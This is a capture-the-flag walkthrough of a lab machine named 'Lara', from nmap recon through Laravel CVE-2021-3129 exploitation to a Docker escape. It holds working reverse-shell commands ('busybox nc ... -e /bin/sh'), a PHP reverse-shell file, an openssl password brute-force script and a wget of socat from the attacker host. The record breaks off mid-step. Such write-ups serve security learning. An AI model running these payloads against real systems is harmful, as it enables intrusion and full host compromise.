Lara

Machine notes

  • QQ group: 660930334

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:52 CST
Nmap scan report for 192.168.2.1
Host is up (0.00068s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00032s latency).
MAC Address: 08:00:27:AE:80:30 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.32
Host is up (0.00062s latency).
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds

Target IP: 192.168.2.32

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.32
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:52 CST
Nmap scan report for 192.168.2.32
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 33.57 seconds

Open ports: 22, 80, 8000

(2) Service and version detection

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,8000 192.168.2.32
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:53 CST
Nmap scan report for 192.168.2.32
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
|_http-title: Ping Utility
8000/tcp open http (PHP 7.3.31)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Mon, 05 Jan 2026 06:53:59 GMT
| Connection: close
| X-Powered-By: PHP/7.3.31
| Cache-Control: no-cache, private
| date: Mon, 05 Jan 2026 06:53:59 GMT
| Content-type: text/html; charset=UTF-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Not Found</title>
| <!-- Fonts -->
| <link rel="preconnect" href="https://fonts.gstatic.com">
| <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">
| <style>
| normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app
| GetRequest:
| HTTP/1.0 200 OK
| Date: Mon, 05 Jan 2026 06:53:59 GMT
| Connection: close
| X-Powered-By: PHP/7.3.31
| Content-Type: text/html; charset=UTF-8
| Cache-Control: private, must-revalidate
| Date: Mon, 05 Jan 2026 06:53:59 GMT
| pragma: no-cache
| expires: -1
| Set-Cookie: XSRF-TOKEN=eyJpdiI6IlhCV29pREd4YUsyQ2R3TG4wQUVzK2c9PSIsInZhbHVlIjoiWFdBeEJIYTl5VWpSRktLSjlwL0RMeHBVdmVXYjc2MHp0MWhaeDFncU45UTQ4Z0t5TWZtRDJEM25DU0ZnTUxLUWFZb3l5cjJrVGJMeHV5ZGhHY0p1Mm95aGhpSTdGQWdVNnhjQlQ1L0creTRZY1cyamdsQ3dpUkdZVVM1NnB5dnkiLCJtYWMiOiJlOWYzZTE3OWQzYjUzZWFiY2Q4NDVkYTFhNjQzZDZmZDU1OGZjMzMyM2RjMzgwYzQ3NzY4ZmQyNjM5YzIwODRiIiwidGFnIjoiIn0%3D; expires=Mon, 05-Jan-2026 08:53:59 GMT; Max-Age=7200; path=/; samesite=lax
|_ Set-Cookie: laravel_session=eyJpdiI6ImRkS1FjcUFNQm9rTk5hc2Fab3B4UkE9PSIsInZhbHVlIjoiSXk3ekJqbkFOTTZFVGdCL2hCQm9ZdDBYZ3BFN2g2L2tzSkJ4bElOOHhybWplb3V0ODFJK1hPUFA5bTFEVjErTzl2RFFwdFFGYjJ1MFR0V1VWckRnTmhpQnNqcitxSU
|_http-title: Laravel
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.94SVN%I=7%D=1/5%Time=695B6009%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,48C0,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Mon,\x2005\x20Jan\x
SF:202026\x2006:53:59\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20P
SF:HP/7\.3\.31\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nCache-Co
SF:ntrol:\x20private,\x20must-revalidate\r\nDate:\x20Mon,\x2005\x20Jan\x20
SF:2026\x2006:53:59\x20GMT\r\npragma:\x20no-cache\r\nexpires:\x20-1\r\nSet
SF:-Cookie:\x20XSRF-TOKEN=eyJpdiI6IlhCV29pREd4YUsyQ2R3TG4wQUVzK2c9PSIsInZh
SF:bHVlIjoiWFdBeEJIYTl5VWpSRktLSjlwL0RMeHBVdmVXYjc2MHp0MWhaeDFncU45UTQ4Z0t
SF:5TWZtRDJEM25DU0ZnTUxLUWFZb3l5cjJrVGJMeHV5ZGhHY0p1Mm95aGhpSTdGQWdVNnhjQl
SF:Q1L0creTRZY1cyamdsQ3dpUkdZVVM1NnB5dnkiLCJtYWMiOiJlOWYzZTE3OWQzYjUzZWFiY
SF:2Q4NDVkYTFhNjQzZDZmZDU1OGZjMzMyM2RjMzgwYzQ3NzY4ZmQyNjM5YzIwODRiIiwidGFn
SF:IjoiIn0%3D;\x20expires=Mon,\x2005-Jan-2026\x2008:53:59\x20GMT;\x20Max-A
SF:ge=7200;\x20path=/;\x20samesite=lax\r\nSet-Cookie:\x20laravel_session=e
SF:yJpdiI6ImRkS1FjcUFNQm9rTk5hc2Fab3B4UkE9PSIsInZhbHVlIjoiSXk3ekJqbkFOTTZF
SF:VGdCL2hCQm9ZdDBYZ3BFN2g2L2tzSkJ4bElOOHhybWplb3V0ODFJK1hPUFA5bTFEVjErTzl
SF:2RFFwdFFGYjJ1MFR0V1VWckRnTmhpQnNqcitxSU")%r(FourOhFourRequest,1AAC,"HTT
SF:P/1\.0\x20404\x20Not\x20Found\r\nDate:\x20Mon,\x2005\x20Jan\x202026\x20
SF:06:53:59\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.3\.3
SF:1\r\nCache-Control:\x20no-cache,\x20private\r\ndate:\x20Mon,\x2005\x20J
SF:an\x202026\x2006:53:59\x20GMT\r\nContent-type:\x20text/html;\x20charset
SF:=UTF-8\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x
SF:20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\
SF:"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20<title>Not\x20Found</title>\n\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:!--\x20Fonts\x20-->\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"pre
SF:connect\"\x20href=\"https://fonts\.gstatic\.com\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<link\x20href=\"https://fonts\.googleapis\.com/css2\?famil
SF:y=Nunito&display=swap\"\x20rel=\"stylesheet\">\n\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<style>\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/\*
SF:!\x20normalize\.css\x20v8\.0\.1\x20\|\x20MIT\x20License\x20\|\x20github
SF:\.com/necolas/normalize\.css\x20\*/html{line-height:1\.15;-webkit-text-
SF:size-adjust:100%}body{margin:0}a{background-color:transparent}code{font
SF:-family:monospace,monospace;font-size:1em}\[hidden\]{display:none}html{
SF:font-family:system-ui,-app");
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.71 seconds

(3) UDP scan

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.32
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 14:54 CST
Nmap scan report for 192.168.2.32
Host is up (0.00095s latency).
All 100 scanned ports on 192.168.2.32 are in ignored states.
Not shown: 100 closed udp ports (port-unreach)
MAC Address: 08:00:27:26:B6:62 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 99.03 seconds

II. Web exploitation

1. Port 80

Browsing to port 80 shows a ping test utility (nmap's http-title: "Ping Utility").

Directory brute force

┌──(root㉿kali)-[/miaosec]
└─# dirsearch -u "http://192.168.2.32"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /miaosec/reports/http_192.168.2.32/_26-01-07_15-41-19.txt

Target: http://192.168.2.32/

[15:41:19] Starting:
[15:41:22] 403 - 548B - /.ht_wsr.txt
[15:41:22] 403 - 548B - /.htaccess.bak1
[15:41:22] 403 - 548B - /.htaccess.orig
[15:41:22] 403 - 548B - /.htaccess.sample
[15:41:22] 403 - 548B - /.htaccess.save
[15:41:22] 403 - 548B - /.htaccessBAK
[15:41:22] 403 - 548B - /.htaccess_orig
[15:41:22] 403 - 548B - /.htaccessOLD
[15:41:22] 403 - 548B - /.htaccess_sc
[15:41:22] 403 - 548B - /.htaccessOLD2
[15:41:22] 403 - 548B - /.htaccess_extra
[15:41:22] 403 - 548B - /.htm
[15:41:22] 403 - 548B - /.html
[15:41:22] 403 - 548B - /.htpasswd_test
[15:41:22] 403 - 548B - /.httr-oauth
[15:41:22] 403 - 548B - /.htpasswds

Task Completed

Nothing of interest: only the usual 403s for .ht* files.

2. Port 8000: Laravel

Browsing to port 8000 shows a Laravel application, version 8.83.29.

Ran TScan against it directly for vulnerability scanning.

Debug mode is enabled, so Laravel's Ignition error page and its /_ignition/execute-solution endpoint are reachable. Searching for known issues turns up an RCE, CVE-2021-3129 (facade/ignition before 2.5.2): with APP_DEBUG=true the endpoint can be abused to write into the Laravel log file and turn it into a PHP deserialization (phar) payload, without any authentication. With debug mode off the endpoint is not exposed and the bug is not reachable.

Exploit used: CVE-2021-3129 (https://github.com/joshuavanderpoll/CVE-2021-3129, which drives phpggc gadget chains; the Laravel/RCE12 chain is used below).

Reverse shell

┌──(.venv)─(root㉿kali)-[/tmp/CVE-2021-3129]
└─# python3 CVE-2021-3129.py --host http://192.168.2.32:8000 --force --exec 'busybox nc 192.168.2.4 4444 -e /bin/sh' --chain Laravel/RCE12
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc

[@] Starting the exploit on "http://192.168.2.32:8000/"...
[@] Testing vulnerable URL "http://192.168.2.32:8000/_ignition/execute-solution"...
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/src/laravel/storage/logs/laravel.log".
[•] Laravel version found: "8.83.29".
[@] Clearing Laravel logs...
[@] Executing command "busybox nc 192.168.2.4 4444 -e /bin/sh"...
[@] Generating payload...
[√] Generated 1 payloads.
[@] Trying chain Laravel/RCE12 [1/1]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.

Shell obtained (root, but as the next section shows, inside a container):

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.32] 45673
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

III. Privilege escalation

Looking around shows we are inside a Docker container (/.dockerenv is present):

ls -la /
total 76
drwxr-xr-x 1 root root 4096 Dec 27 14:52 .
drwxr-xr-x 1 root root 4096 Dec 27 14:52 ..
-rwxr-xr-x 1 root root 0 Dec 27 14:52 .dockerenv
drwxr-xr-x 1 root root 4096 Oct 15 2021 bin
drwxr-xr-x 5 root root 320 Jan 7 07:39 dev
.....

1. Docker escape via a bind mount

Check the mount points:

cat /proc/mounts
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/HXF4EH4QOP3PFP3WTXAFCUYMBI:/var/lib/docker/overlay2/l/BARM5SFR2TDZXCWIKPJVP2J54E:/var/lib/docker/overlay2/l/WBRDWAEECENUU744T54A2LXZS2:/var/lib/docker/overlay2/l/NYXBJ27GGJQWKCMYO6UJ4PRDD7:/var/lib/docker/overlay2/l/2CGOJZXYDP7ZY76NGXFCI5O77M:/var/lib/docker/overlay2/l/IB3IOPHPLAJEAHVWBQ5EYWLJJB:/var/lib/docker/overlay2/l/TNVVYE4RJB4773NBEHZQJWHY5E:/var/lib/docker/overlay2/l/IOUASKU43UPNCLUUQ5KR23KJZY:/var/lib/docker/overlay2/l/YQBYPMD2COWEBNNFP3NG4MISG4:/var/lib/docker/overlay2/l/DWNKLEE43NWMUACFFMR4P4WQAQ:/var/lib/docker/overlay2/l/JPKS6LRXO6GCPCLFSECB5M7YXM:/var/lib/docker/overlay2/l/PLZ3W24FVFNOEIBO3NEBTHLUQC:/var/lib/docker/overlay2/l/YCCIGEY34PYNHMPJCSJZJTX7KA:/var/lib/docker/overlay2/l/BYIG4G4KUGNW7GQJNXR6VFL5EZ,upperdir=/var/lib/docker/overlay2/72161e40a27ae003179fc6ca386782b5bcd3aeac2b5e819784305d9435966540/diff,workdir=/var/lib/docker/overlay2/72161e40a27ae003179fc6ca386782b5bcd3aeac2b5e819784305d9435966540/work 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0
/dev/sda3 /etc/resolv.conf ext4 rw,relatime 0 0
/dev/sda3 /etc/hostname ext4 rw,relatime 0 0
/dev/sda3 /etc/hosts ext4 rw,relatime 0 0
/dev/sda3 /var/www/html ext4 rw,relatime 0 0
proc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0
tmpfs /proc/asound tmpfs ro,relatime,inode64 0 0
tmpfs /proc/acpi tmpfs ro,relatime,inode64 0 0
tmpfs /proc/interrupts tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/keys tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/latency_stats tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/timer_list tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/scsi tmpfs ro,relatime,inode64 0 0
tmpfs /sys/firmware tmpfs ro,relatime,inode64 0 0

Besides the three files Docker always injects (/etc/resolv.conf, /etc/hostname, /etc/hosts), the host's /var/www/html (on the host's /dev/sda3) is bind-mounted into the container read-write. That directory is the web root of the nginx site on port 80, which runs on the host, so anything written here is served and executed by the host's PHP, outside the container. Note also that /sys, /sys/fs/cgroup, /proc/sys and /proc/sysrq-trigger are all read-only, so this is not a privileged container and the bind mount is the only foothold on the host from here.
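The mount triage above, as an added example that is not part of the original writeup: a small script that reads a /proc/mounts listing (by default the one captured from this container, embedded as sample data with the overlay lowerdir list shortened), separates Docker's three default injected files from any other host block-device mount, reports whether each is rw, and checks whether the kernel interfaces that are read-only in a default container are writable. The mount-point list it checks is a choice made here, not something the page prescribes.

```shell
#!/usr/bin/env bash
# Triage a container's /proc/mounts for host footholds. Added example, not code
# from the original writeup. Docker always bind-mounts /etc/resolv.conf,
# /etc/hostname and /etc/hosts from the host; any OTHER /dev/* mount is an
# operator choice and worth a look, especially when it is rw. Writable /sys,
# cgroup, /proc/sys or /proc/sysrq-trigger would indicate --privileged or a
# loosened profile.

# Sample copied from the Lara container above (constructed test data for this
# script; the overlay lowerdir list is shortened to its first and last layer).
SAMPLE_MOUNTS='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/HXF4EH4QOP3PFP3WTXAFCUYMBI:/var/lib/docker/overlay2/l/BYIG4G4KUGNW7GQJNXR6VFL5EZ,upperdir=/var/lib/docker/overlay2/72161e40a27ae003179fc6ca386782b5bcd3aeac2b5e819784305d9435966540/diff,workdir=/var/lib/docker/overlay2/72161e40a27ae003179fc6ca386782b5bcd3aeac2b5e819784305d9435966540/work 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0
/dev/sda3 /etc/resolv.conf ext4 rw,relatime 0 0
/dev/sda3 /etc/hostname ext4 rw,relatime 0 0
/dev/sda3 /etc/hosts ext4 rw,relatime 0 0
/dev/sda3 /var/www/html ext4 rw,relatime 0 0
proc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0
tmpfs /sys/firmware tmpfs ro,relatime,inode64 0 0'

# Print "<rw|ro> <mountpoint> <device>" for every /dev/* block-device mount
# except Docker's three default injected files. $1 is a mounts file.
host_bind_mounts() {
    awk '$1 ~ /^\/dev\// && $2 !~ /^\/etc\/(resolv\.conf|hostname|hosts)$/ {
            n = split($4, opts, ",")
            mode = "ro"
            for (i = 1; i <= n; i++) if (opts[i] == "rw") mode = "rw"
            print mode, $2, $1
        }' "$1"
}

# Print kernel interfaces that are ro in an unprivileged container but are
# mounted rw here. No output means the usual protections are in place.
writable_kernel_ifaces() {
    awk '($2 == "/sys" || $2 == "/sys/fs/cgroup" || $2 == "/proc/sys" || $2 == "/proc/sysrq-trigger") {
            n = split($4, opts, ",")
            for (i = 1; i <= n; i++) if (opts[i] == "rw") print $2
        }' "$1"
}

# Human-readable report over a mounts file.
triage_mounts() {
    local f="$1"
    echo "[*] host block-device mounts (Docker's default resolv.conf/hostname/hosts excluded):"
    host_bind_mounts "$f" | sed 's/^/    /'
    echo "[*] writable kernel interfaces (empty means not privileged):"
    writable_kernel_ifaces "$f" | sed 's/^/    /'
}

# Run against a mounts file given on the command line (e.g. /proc/mounts from
# inside the container), otherwise against the embedded sample.
MOUNTS_FILE="${1:-}"
if [ -z "$MOUNTS_FILE" ]; then
    MOUNTS_FILE=$(mktemp)
    printf '%s\n' "$SAMPLE_MOUNTS" > "$MOUNTS_FILE"
fi
triage_mounts "$MOUNTS_FILE"
```

On the sample it reports a single rw host mount, /var/www/html from /dev/sda3, and no writable kernel interfaces, which is exactly the situation exploited below.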

cd /var/www/html
ls -la
total 16
drwxr-xr-x 2 root root 4096 Dec 28 10:31 .
drwxr-xr-x 3 root root 4096 Aug 27 2021 ..
-rw-r--r-- 1 root root 19 Dec 29 15:18 a.php
-rw-r--r-- 1 root root 3617 Dec 27 14:55 index.php
cat a.php
<?php phpinfo();?>

Drop a reverse-shell PHP file into that directory and request it over port 80:

cat re.php
<?php
exec("busybox nc 192.168.2.4 4444 -e /bin/sh");
?>

Shell obtained, this time on the host itself, as the unprivileged nobody user:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.32] 37271
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

2. Docker escape via the Docker API

Under /home/alice/ilovealice there is a file named "..." (three dots):

cat ...
openssl enc -aes-256-cbc -in certs.tar.gz -out tar.gz.enc -iter 10000 -pbkdf2

This is the command that was used to protect the certificates: certs.tar.gz was encrypted with AES-256-CBC using a PBKDF2-derived key (10000 iterations), producing tar.gz.enc. The encrypted output is what sits in .docker as .enc; the password is not recorded anywhere, so it has to be brute-forced, and the same PBKDF2 parameters must be used when trying candidates.

cd .docker
ls -la
total 20
drwxr-sr-x 3 alice alice 4096 Dec 30 00:31 .
drwxr-sr-x 4 alice alice 4096 Dec 30 00:38 ..
-rw-r--r-- 1 root alice 5248 Dec 30 00:28 .enc
drwx------ 2 root root 4096 Dec 30 00:22 certs

The .enc file is world-readable. Copy it into the web root so it can be downloaded over port 80:

chmod 777 rev.txt
cat /home/alice/.docker/.enc > rev.txt

Had an AI write a brute-force script: one openssl decryption attempt per candidate password, with the gzip magic bytes as the success check.

#!/bin/bash
# Brute-force the password of a file produced by
#   openssl enc -aes-256-cbc -pbkdf2 -iter 10000
# One decryption attempt per wordlist entry. The exit code of openssl alone is
# not a reliable oracle (a wrong key still yields valid PKCS#7 padding about
# 1 time in 256), so the output is accepted only if it starts with the gzip
# magic bytes 1f 8b.

# Usage check
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <encrypted_file.tar.gz.enc> <wordlist.txt>"
    exit 1
fi

ENC_FILE="$1"
WORDLIST="$2"

if [ ! -f "$ENC_FILE" ]; then
    echo "Error: Encrypted file '$ENC_FILE' not found."
    exit 1
fi

if [ ! -f "$WORDLIST" ]; then
    echo "Error: Wordlist '$WORDLIST' not found."
    exit 1
fi

echo "[*] Starting brute-force on '$ENC_FILE' using '$WORDLIST'..."

# Temporary file for the decrypted output
TMP_DEC="/tmp/decrypted_$$"

# Attempt counter
COUNT=0

while IFS= read -r PASS || [ -n "$PASS" ]; do
    ((COUNT++))

    # Skip empty lines
    if [ -z "$PASS" ]; then
        continue
    fi

    # Try to decrypt with the current password
    # -d: decrypt
    # -pbkdf2 -iter 10000: must match the settings recorded in the "..." file
    # -pass pass:"$PASS": pass the password directly instead of via stdin
    # stderr to /dev/null to suppress "bad decrypt" noise
    if openssl enc -d -aes-256-cbc \
        -in "$ENC_FILE" \
        -out "$TMP_DEC" \
        -pbkdf2 -iter 10000 \
        -pass pass:"$PASS" 2>/dev/null; then

        # Accept only if the output is valid gzip (magic bytes: 1f 8b)
        if [ -f "$TMP_DEC" ] && head -c 2 "$TMP_DEC" | hexdump -C | grep -q "1f 8b"; then
            echo ""
            echo "[+] SUCCESS! Password found: $PASS"
            mv "$TMP_DEC" "./decrypted.tar.gz"
            echo "[+] Decrypted file saved as 'decrypted.tar.gz'"
            exit 0
        else
            # Padding happened to be valid but the plaintext is garbage: keep going
            rm -f "$TMP_DEC"
        fi
    fi

    # Progress every 1000 attempts
    if [ $((COUNT % 1000)) -eq 0 ]; then
        echo "[*] Tried $COUNT passwords..."
    fi

done < "$WORDLIST"

rm -f "$TMP_DEC"
echo "[-] Password not found in wordlist."
exit 1

The password is recovered: 060606

┌──(root㉿kali)-[/tmp]
└─# ./bp.sh enc /usr/share/wordlists/rockyou.txt
[*] Starting brute-force on 'enc' using '/usr/share/wordlists/rockyou.txt'...
[*] Tried 1000 passwords...
[*] Tried 2000 passwords...

[+] SUCCESS! Password found: 060606
[+] Decrypted file saved as 'decrypted.tar.gz'

Extracting certs.tar.gz yields a CA certificate, a client certificate and the matching private key: exactly the bundle a Docker client uses to authenticate to a daemon that listens over TLS with --tlsverify (the daemon accepts any client certificate that chains to its configured CA).

┌──(root㉿kali)-[/tmp/certs]
└─# cat ca.pem
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----


┌──(root㉿kali)-[/tmp/certs]
└─# cat client-cert.pem
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----


┌──(root㉿kali)-[/tmp/certs]
└─# cat client-key.pem
-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
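
Before hunting for the daemon it is worth confirming that the recovered bundle is actually usable: that the client certificate chains to the CA, that the key really belongs to the certificate, and that the certificate is marked for TLS client authentication rather than being a server or CA cert. The following script is an added example, not code from the original writeup; it covers the extraction step above and the "these are Docker API credentials" conclusion below. Because the page's certificates are redacted, it also generates a throwaway CA and client certificate locally as a test fixture (names such as example-docker-ca and the 1-day validity are assumptions made here). It needs only the openssl CLI.

```shell
#!/usr/bin/env bash
# Sanity-check a recovered Docker TLS client bundle (ca.pem, client-cert.pem,
# client-key.pem) before pointing a client at the daemon. Added example, not
# code from the original writeup. Checks performed:
#   1. client-cert.pem chains to ca.pem (openssl verify also enforces the
#      validity period),
#   2. client-key.pem is the private key for client-cert.pem,
#   3. the certificate carries extendedKeyUsage = clientAuth, the profile
#      Docker's TLS documentation uses for client certificates.

# SHA-256 of the DER-encoded public key contained in a certificate.
cert_pubkey_fp() {
    openssl x509 -in "$1" -noout -pubkey \
        | openssl pkey -pubin -outform DER \
        | openssl dgst -sha256 | awk '{print $NF}'
}

# SHA-256 of the DER-encoded public key derived from a private key.
key_pubkey_fp() {
    openssl pkey -in "$1" -pubout -outform DER \
        | openssl dgst -sha256 | awk '{print $NF}'
}

# Returns 0 when the bundle is usable for Docker client auth, 1 otherwise.
check_docker_client_certs() {
    local ca="$1" cert="$2" key="$3"

    if ! openssl verify -CAfile "$ca" "$cert" >/dev/null 2>&1; then
        echo "[-] $cert does not chain to $ca (or is outside its validity period)"
        return 1
    fi

    local cert_fp key_fp
    cert_fp=$(cert_pubkey_fp "$cert")
    key_fp=$(key_pubkey_fp "$key" 2>/dev/null)
    if [ -z "$cert_fp" ] || [ "$cert_fp" != "$key_fp" ]; then
        echo "[-] $key is not the private key for $cert"
        return 1
    fi

    if ! openssl x509 -in "$cert" -noout -text | grep -q 'TLS Web Client Authentication'; then
        echo "[-] $cert has no clientAuth extended key usage"
        return 1
    fi

    echo "[+] usable Docker client bundle: $(openssl x509 -in "$cert" -noout -subject)"
    return 0
}

# Test fixture (assumption, not the target's files): a throwaway CA and a
# clientAuth certificate written into directory $1.
make_test_bundle() {
    local d="$1"
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=example-docker-ca" \
        -keyout "$d/ca-key.pem" -out "$d/ca.pem" 2>/dev/null
    openssl req -newkey rsa:2048 -nodes -subj "/CN=client" \
        -keyout "$d/client-key.pem" -out "$d/client.csr" 2>/dev/null
    printf 'extendedKeyUsage = clientAuth\n' > "$d/ext.cnf"
    openssl x509 -req -in "$d/client.csr" -CA "$d/ca.pem" -CAkey "$d/ca-key.pem" \
        -CAcreateserial -days 1 -extfile "$d/ext.cnf" -out "$d/client-cert.pem" 2>/dev/null
}

# Usage: ./check_bundle.sh ca.pem client-cert.pem client-key.pem
if [ "$#" -eq 3 ]; then
    check_docker_client_certs "$1" "$2" "$3"
fi
```

Run it against the extracted /tmp/certs files; a passing result means the only remaining question is where the daemon listens, which the netstat output below answers.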

These are Docker daemon TLS client credentials, so whoever holds them is a fully trusted client of the Docker API, which is equivalent to root on the host. Check what is listening on the host:

netstat -alnpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2376 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
tcp 0 54 192.168.2.32:37271 192.168.2.4:4444 ESTABLISHED 3233/sh
tcp 9 0 127.0.0.1:9000 127.0.0.1:33776 CLOSE_WAIT -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::8000 :::* LISTEN -

Port 2376 (the conventional Docker TLS port) is bound to 127.0.0.1 only, so it has to be forwarded out first. Pull a static socat binary from the attacker machine (served on port 800) and relay 0.0.0.0:2377 to 127.0.0.1:2376:

wget http://192.168.2.4:800/socat
ls -la
total 372
drwxrwxrwt 4 root root 100 Jan 7 17:23 .
drwxr-xr-x 21 root root 4096 Jun 3 2025 ..
